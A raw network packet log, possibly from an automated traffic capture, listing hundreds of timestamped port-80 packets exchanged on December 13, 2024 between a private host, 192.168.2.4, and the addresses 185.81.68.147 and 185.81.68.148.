Dec 13, 2024 07:47:47.601650953 CET	80	49779	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:47.601660013 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.601738930 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.601804972 CET	49773	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:47.601824045 CET	49779	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:47.602010012 CET	49779	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:47.602030039 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.602039099 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.602047920 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.602056980 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.602066040 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.602104902 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.602113962 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.602121115 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.602130890 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.602145910 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.602154970 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.602262974 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.602272987 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.602281094 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.602289915 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.602298021 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.602307081 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.602314949 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.602564096 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.602636099 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.602644920 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.602653027 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.602662086 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.602669954 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.602691889 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.602699995 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.602708101 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.602715969 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.602730989 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.602740049 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.602760077 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.602802038 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.602869987 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.602895975 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.602905035 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.603023052 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.603033066 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.603040934 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.603050947 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.603059053 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.603336096 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.603394985 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.603403091 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.603418112 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.603426933 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.603435040 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.603451014 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.603462934 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.603491068 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.603498936 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.603514910 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.603523970 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.603554964 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.603588104 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.603596926 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.603673935 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.603682995 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.603691101 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.604000092 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.604044914 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.604053974 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.604062080 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.604079008 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.604088068 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.604191065 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.604199886 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.604207039 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.604216099 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.604224920 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.604242086 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.604249954 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.604258060 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.604266882 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.604440928 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.604449987 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.604458094 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.604468107 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.604543924 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.604552984 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.604559898 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.604568005 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.604578972 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.605643034 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.605654001 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.605660915 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.605674028 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.605690002 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.605700016 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.605735064 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.605743885 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.605859995 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.605870962 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.605880022 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.605889082 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.605897903 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.605907917 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.605915070 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.605925083 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.605932951 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.605942011 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.605950117 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.605953932 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.605957031 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.605978012 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.605986118 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.606066942 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.606076002 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.606110096 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.606118917 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.606165886 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.606174946 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.606189013 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.606198072 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.607530117 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.607549906 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.607558966 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.607666969 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.607676983 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.607683897 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.607692957 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.607702017 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.607711077 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.607719898 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.607728004 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.607737064 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.607743979 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.607753038 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.607762098 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.607769966 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.607788086 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.607798100 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.607805967 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.607815027 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.607824087 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.608269930 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.608279943 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.608294964 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.608304977 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.608314037 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.608377934 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.608386993 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.608395100 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.608405113 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.608413935 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.608423948 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.608434916 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.608444929 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.608454943 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.608496904 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.608505964 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.608513117 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.608521938 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.608537912 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.608597040 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.608669043 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.608742952 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.609153986 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.609241962 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.609251022 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.609277964 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.609287024 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.609342098 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.609350920 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.609358072 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.609473944 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.609483004 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.609489918 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.609498978 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.609508991 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.609517097 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.609528065 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.609839916 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.609898090 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.609906912 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.609914064 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.609922886 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.609940052 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.609949112 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.609982014 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.610061884 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.610070944 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.610079050 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.610167980 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.610178947 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.610186100 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.610196114 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.610203981 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.610213995 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.610223055 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.610230923 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.610240936 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.610249043 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.610685110 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.610694885 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.610783100 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.610791922 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.610800028 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.610897064 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.610908031 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.610914946 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.610924006 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.610932112 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.610941887 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.610950947 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.610960007 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.610970020 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.610979080 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.610986948 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.610996008 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.611013889 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.611022949 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.611030102 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.611037970 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.611047983 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.611227036 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.611253023 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.611301899 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.611310959 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.611356020 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.611365080 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.611371994 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.611383915 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.611433983 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.611488104 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.611496925 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.611504078 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.611521006 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.611531019 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.611540079 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.611548901 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.611610889 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.611619949 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.611627102 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.611638069 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.611646891 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.611654043 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.611661911 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.612116098 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.612126112 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.612135887 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.612168074 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.612215042 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.612225056 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.612395048 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.612404108 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.612411022 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.612420082 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.612423897 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.612427950 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.612435102 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.612443924 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.612669945 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.612701893 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.612744093 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.612752914 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.612792015 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.612799883 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.612826109 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.612914085 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.612925053 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.612932920 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.613045931 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.613054991 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.613063097 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.613071918 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.613080025 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.613090038 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.613097906 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.613107920 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.613116980 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.613326073 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.613404989 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.613430023 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.613440037 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.613455057 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.613476038 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.613506079 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.613545895 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.613555908 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.613598108 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.613653898 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.613663912 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.613748074 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.613758087 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.613761902 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.613765001 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.613770008 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.613773108 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.614206076 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.614248037 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.614316940 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.614326000 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.614355087 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.614363909 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.614373922 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.614404917 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.614454031 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.614463091 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.614470005 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.614501953 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.614511013 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.614552975 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.614562988 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.614572048 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.614597082 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.615103006 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.615113020 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.615119934 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.615128994 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.615144968 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.615154982 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.615163088 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.615173101 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.615189075 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.615197897 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.615209103 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.615238905 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.615255117 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.615284920 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.615330935 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.615340948 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.615411043 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.615421057 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.615431070 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.615442038 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.615551949 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.615561008 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.615794897 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.615894079 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.615910053 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.615921021 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.615958929 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.616031885 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.616040945 CET	80	49778	185.81.68.148	192.168.2.4
